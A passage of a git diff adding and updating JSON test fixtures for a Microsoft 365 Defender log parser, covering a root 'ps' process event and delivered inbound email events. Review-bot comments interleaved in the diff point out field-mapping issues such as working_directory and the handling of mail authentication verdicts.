@@ -1,6 +1,12 @@ { "input": { - "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, 
\"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, 
\"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}" + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", 
\"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\
":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } }, "expected": { "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": 
\"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": 
\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, 
\"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}",
@@ -49,20 +55,23 @@
 "-o",
 "comm,pid,pcpu,pmem,rss,etimes"
 ],
- "code_signature": {
- "status": "Unknown",
- "subject_name": "Unknown"
- },
 "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers",
+ "name": "ps",
 "parent": {
- "pid": 0
+ "code_signature": {
+ "status": "Unknown",
+ "subject_name": "Unknown"
+ },
+ "pid": 423627,
+ "start": "2024-10-22T15:09:44.590000Z",
+ "user": {
+ "domain": "computer",
+ "name": "root"
+ }
 },
 "pid": 423627,
 "start": "2024-10-22T15:09:44.594155Z",
- "user": {
- "domain": "computer",
- "name": "root"
- }
+ "working_directory": "/usr/bin"
 },
 "related": {
 "hash": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json
new file mode 100644
index 000000000..11ca88986
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json
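Review bot: The new expected `"working_directory": "/usr/bin"` is the directory part of the input's `FolderPath` (`/usr/bin/ps`), not the process's working directory: the same event's `AdditionalFields` carries `ProcessCurrentWorkingDirectory` = `/opt/microsoft/mdatp/sbin`. ECS `process.working_directory` means the current working directory, so a rule keyed on it would see the binary's install location instead of where `ps` was launched from, while `FolderPath` itself (the full path) would be the natural value for `process.executable`. The test_device_process_events.json hunk shows the same field change (`C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2301.6-0`), though that fixture's input is not in view so the source field there is inferred. If the cwd is only available from `AdditionalFields`, the expected value here should be `/opt/microsoft/mdatp/sbin`, with `working_directory` left unset when that field is absent.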
@@ -0,0 +1,76 @@
+{
+ "input": {
+ "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Microsoft 365 Defender",
+ "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+ }
+ }
+ },
+ "expected": {
+ "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}",
+ "event": {
+ "action": "Delivered",
+ "category": [
+ "connection",
+ "email"
+ ],
+ "dataset": "email_events",
+ "type": [
+ "allowed",
+ "info"
+ ]
+ },
+ "@timestamp": "2024-10-28T14:18:40Z",
+ "action": {
+ "properties": {
+ "AttachmentCount": 0,
+ "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}",
+ "Connectors": "Relai SMTP interne",
+ "DeliveryAction": "Delivered",
+ "DeliveryLocation": "Inbox/folder",
+ "EmailClusterId": "3162398878",
+ "EmailDirection": "Inbound",
+ "EmailLanguage": "en",
+ "OrgLevelAction": "Allow",
+ "OrgLevelPolicy": "Connection policy",
+ "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef",
+ "SenderFromDomain": "company.com",
+ "UrlCount": 0
+ }
+ },
+ "email": {
+ "direction": "inbound",
+ "from": {
+ "address": [
+ "john.doe@company.com"
+ ]
+ },
+ "local_id": "12345678-1234-abcd-ef90-abcdef123456",
+ "message_id": "<1@eu-west-1.test.com>",
+ "subject": "MAIL subject",
+ "to": {
+ "address": [
+ "alan.smithee@company.com"
+ ]
+ }
+ },
+ "microsoft": {
+ "defender": {
+ "report": {
+ "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c"
+ }
+ }
+ },
+ "related": {
+ "ip": [
+ "1.2.3.4"
+ ]
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json
new file mode 100644
index 000000000..d3b7b8c2f
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json
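Review bot: `action.properties.AuthenticationDetails` keeps the SPF/DKIM/DMARC verdicts only as a re-serialized JSON string (`{"DKIM": "none", "DMARC": "pass", "SPF": "pass"}`); the key reordering shows the parser already decodes the object but exposes no per-mechanism field. Rules that look for DMARC or SPF failures on inbound mail then have to substring-match that blob, which is brittle; mapping the three verdicts to dedicated fields (e.g. `"<intake-namespace>.authentication.dmarc": "pass"`, name per the intake's field conventions) would make them queryable. Separately, `SenderMailFromAddress` (envelope sender) and `SenderFromAddress` (header From) are identical here, so the fixture cannot tell whether the parser keeps both; they diverge in spoofed mail, and only one address reaches `email.from.address` in this expected output.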
@@ -0,0 +1,76 @@
+{
+ "input": {
+ "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Microsoft 365 Defender",
+ "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+ }
+ }
+ },
+ "expected": {
+ "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}",
+ "event": {
+ "action": "Delivered",
+ "category": [
+ "connection",
+ "email"
+ ],
+ "dataset": "email_events",
+ "type": [
+ "allowed",
+ "info"
+ ]
+ },
+ "@timestamp": "2024-10-28T14:18:38Z",
+ "action": {
+ "properties": {
+ "AttachmentCount": 0,
+ "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}",
+ "Connectors": "Relai SMTP interne",
+ "DeliveryAction": "Delivered",
+ "DeliveryLocation": "Inbox/folder",
+ "EmailClusterId": "2633942188",
+ "EmailDirection": "Inbound",
